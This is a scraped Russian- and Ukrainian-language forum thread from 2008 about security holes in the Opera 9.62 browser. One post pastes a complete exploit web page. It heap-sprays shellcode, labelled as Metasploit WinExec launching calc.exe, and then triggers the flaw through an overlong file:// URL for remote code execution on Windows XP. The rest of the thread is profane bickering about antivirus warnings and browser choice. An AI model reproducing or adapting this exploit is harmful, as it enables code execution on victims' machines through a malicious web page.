Перегляньте відео нижче, щоб дізнатися, як встановити наш сайт як веб-програму на головному екрані.
Замітка: This feature may not be available in some browsers.
Not Found
The requested URL /error/HTTP_SERVICE_UNAVAILABLE.html.var was not found on this server.
Та нормальный браузер
ставить 9.62 сейчас опасно для сёрфо
Посилання видалено
<html>
<head><title>uh?</title></head>
<body>
<script>
// k`sOSe 11/15/2008
// tested on Windows XP SP3, opera 9.62 international version
// vulnerability found by send9
// there are many ways to achieve code execution, tons of function pointers to overwrite.
// maybe there's one more reliable...
var i=0;
// push es, pop es
var block = unescape("%u0607؇");
// metasploit WinExec c:\WINDOWS\system32\calc.exe
var shellcode = unescape("D䖋謼ռŸ误ᡏ律Ġ䧫㒋Ƌ駀蒬瓀섇්숁吻Ф律Ĥ曫ಋ譋ᱟƋ觫쌄ㅟ惶摖䚋謰ీ炋괜梋褈菸櫀桐諰弄顨諾圎㩃坜义佄南獜獹整㍭尲慣捬攮數䄀");
while (block.length < 81920) block += block;
var memory = new Array();
for (;i<1000;i++) memory[i] += (block + shellcode);
var evil = "file://";
for(var i = 0; i<16438; i++)
evil += "X";
evil += "R.";
window.location.replace(evil);
</script>
</body>
</html>
А можешь подробно (или не очень) рассказать как именно?
флудер, а теперь смотри туда и сюдаопера дірявое гуано, ставить 9.62 сейчас опасно для сёрфо
Посилання видалено
мой каспер заметил и заругался...сие значит что ваш кампутер может біть віебан после посещения очередной странички даже школьником
ну а далее как правило ****ёж типа угнали асю, веб мани, а вот касперский ничего **** не заметил и поєтому он самій гавёній антивирь )))))))))
К опере привык, имхо: лучший брауз но сижу на 9.27 и никаких глюков. Когда вышла еще 9.50 попробовал-не понравилось с тех пор не обновляюсь (от добра добра не ищут)

и не бузим, что Опера "дірявое гуано"
дырки есть, были и будут везде, а иногда они еще и вылазят)
параноики могут вырубить скрипжавы и спать спокойно до нейтрализации дырки
мой каспер заметил и заругался...
это показывает только его ****утостьДа и сайт ихний живее всех живых![]()
а мне ***** от чего тебе легче, от чего нет.с какого *** ты к опере приплёл фокса и прочих?
мне ***** не легче от того что у фокса были дыры
оратор выше посоветовал поставить оперу, что бы её поставить нужно её скачать, улавливаешь связь?мне интересно - каким боком ты связываешь падение сайта и дырки в опере???
ответ типичного одноклеточного офисного планктонаа мне ***** от чего тебе легче, от чего нет.
связи не видел, (ибо не видел связи между "обновлением оперы" и "не работающим жмылом") спасибо, уловилоратор выше посоветовал поставить оперу, что бы её поставить нужно её скачать, улавливаешь связь
ответ в твоем стилеответ типичного одноклеточного офисного планктона
блин ну я же написал "ставить 9.62 сейчас опасно", ключевое слово СЕЙЧАСа ты уверен, что в других браузерах нет открытых уязвимостей?
со словесами поаккуратней

я не говорил что на листинг! я как добропорядочный гражданин решил проверить предложеный сплойт на своей опере - сохранил в тхт. а потом в джс переименовывать собрался, а тут каспер как заорйот: "*****! эта херь будет простым текстом ибо в джаваскрипте оно несйот вселенское зло, подобное тому, которое несйот Стив Балмер"ну дык он заругался на обычный листингэто показывает только его ****утость